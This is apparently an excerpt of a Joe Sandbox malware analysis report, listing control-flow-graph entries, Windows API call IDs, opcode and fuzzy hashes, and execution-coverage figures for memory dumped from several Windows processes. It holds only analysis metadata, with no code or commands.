                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9b2a996806d0e1ab8775e128a97441143bc041f4e270ebe5118209dafafe8652
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0F09026C1D641CBAA268B1CD8829793BA3BF412D0B5C4049C54BCB123DA2BD806C753
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: _clrfp
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 3618594692-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: eb89a8a385eca23818c00267d82649db9f1e568ecff9ee33809bd01fc8c9252f
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0b73e033d43f55f71e1b6c96d673c53d9607d73c77ba2ae8568d9873bd2c98d3
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb89a8a385eca23818c00267d82649db9f1e568ecff9ee33809bd01fc8c9252f
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06B14831510B4DCFEB9ADF1CC88ABA677E0FB59308F198599E859CB2A1C335D852CB41

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Coverage:5.3%
                                                                                                                                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Nodes:56
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:4

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph

[Control-flow graph not preserved; legend: Executed / Not Executed. API calls labelled in the graph: CreateThread, CloseHandle.]
APIs
Memory Dump Source
• Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0

Control-flow Graph

[Control-flow graph not preserved; legend: Executed / Not Executed. API calls labelled in the graph: CreateThread, CloseHandle.]
APIs
Memory Dump Source
• Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
Similarity
• API ID: CreateThread$CloseHandle
• String ID:
• API String ID: 738052048-0

Control-flow Graph

[Control-flow graph not preserved; legend: Executed / Not Executed. API calls labelled in the graph: CreateThread, CloseHandle.]
APIs
Memory Dump Source
• Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
Similarity
• API ID: CreateThread$CloseHandle
• String ID:
• API String ID: 738052048-0

Control-flow Graph

[Control-flow graph not preserved; legend: Executed / Not Executed. API call labelled in the graph: VirtualAlloc.]
APIs
Memory Dump Source
• Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
Similarity
• API ID: wcscpy
• String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 1284135714-0

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

APIs
• CloseHandle.KERNELBASE ref: 00BE830B
• GetTokenInformation.KERNELBASE ref: 00BE8369
Memory Dump Source
• Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
Similarity
• API ID: CloseHandleInformationToken
• String ID:
• API String ID: 3954737543-0
• Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
• Instruction ID: 87b0f20f54f9252f5619a7b4e2c673bb922280b839440e3d005162fb10a400e8
• Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
• Instruction Fuzzy Hash: 1AF06D34409EC2CB9A268A17D48053527E1EE61750B6840D9D44ECB162CF28DC02E76A

Execution Graph

Execution Coverage:5.4%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:0%
Total number of Nodes:62
Total number of Limit Nodes:4

Control-flow Graph

• Executed
• Not Executed
Memory Dump Source
• Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
• Instruction ID: 5b8df1e3048b2dc71c851735b053fc846665285a9bd45dcdc19b72efb4852fca
• Opcode Fuzzy Hash: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
• Instruction Fuzzy Hash: A2B1293450EA66CBC729CB1CA481275B7A1FFB5318F2C8659D8CBC7166DE24DC02A376

Control-flow Graph

• Executed
• Not Executed
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
• Instruction ID: 16d53580ed2a3c5b3a0690c5b366b87d7d491efa3a22dc0b1195cf5b7b535bdc
• Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
• Instruction Fuzzy Hash: D241E220608F298FDB689728B409F3927D1EBB531CF5C01AAD446CB1ADEA35CC01A772

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 087ff7d6d16cc6327b9a5f341d223b13e78c5ac83f0ac5b07ad4de6eba279160
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EF0C22161CE2585DB2C8629B859B3A63C1A7B932CF6C475AC097C90DCFA75C901A235

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

[Control-flow graph figure omitted. Named API calls on the graph: CreateThread, CloseHandle.]
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a4a21c725e83fd5e75ec8b5d1bf0564c1857d88227c72374940ca83cf1eb527
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15B09201029EA6550215123034089280A846AA623CA785BA98BB2468DAE82058046730

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

[Control-flow graph figure omitted. Named API calls on the graph: VirtualAlloc.]
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 1284135714-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: ba0acb4e1046a8efdd5dcf168ada09d669d2603bff7b8c7483f4d4c3a5800a69
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E21D42056DEB48BC76A93187493E7526A2F7B532CF5C03CBD0C6C718ED938AD448272

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

[Control-flow graph figure omitted. Named API calls on the graph: CloseHandle, GetTokenInformation.]
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE ref: 00D2830B
                                                                                                                                                                                                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE ref: 00D28369
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 3954737543-0

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Coverage:5.4%
                                                                                                                                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Nodes:66
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:5

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 39baefc33e140fcb93515faf968af9d8390162026be8828d2141562e5b2cc3d3
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4B1263050DE458BDF29CB1D848123AB7A9FF97354F288A5DD4ABC7166DE28DC42C392

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
control_flow_graph: edge list omitted; first node 995b8f-995c20; named API calls: CreateThread, CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: acc9c409bfed6f971381e37a24b597da9492e4a9f0360d1c688dd96e81bdce6a
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47411920608F098FDF6BAB2C945D33B36D8EB95311F5B096AD44BCB1E5FE288C458752

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
control_flow_graph: edge list omitted; first node 995d22-995d45; named API calls: CreateThread, CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e56561c007d774261732b7bccef2e4da0144bf46c666fb8970ae97739386d307
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93F0F02061CE0586DF2F9B3C985933B62C9A799332F670F1ED097C90E4FA2889029309

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
control_flow_graph: edge list omitted; first node 995d50-995d5b; named API calls: CreateThread, CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 42431177af9be29fe9dc5de00db3a3f2557320f6d74cc522e1d840be51bc5390
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64B01200028F86874C2F1F3C044812B098C2E46A359771F6C9FB7968E2E8042C446330

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 1284135714-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 655c549b9f886a94e7d5be0656f95a1334282e8075c07f0bc5171c697869af75
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F821D72051FE848FDF6B931C44953BB26A6B7A5324F9B07CBD086C7192C92C4D05D35E

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d94446af1396888a6581757143bab7780411ceaaf94c390b59d46c2bbfe0cd57
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67F0F43451DA518FCE66871D907153FEBA8AF83740B69049EE447CB512CE18DC01D352

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 60e192b49798a9d5bcc22fe71543ea4703616afd0ee9c71774501148c4b05738
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0903551CA418B9E75871C8461A3FA76CAB537C0B6C489DD467CB522CE28DC42E752

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE ref: 0099830B
                                                                                                                                                                                                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE ref: 00998369
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 3954737543-0

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Coverage:4.6%
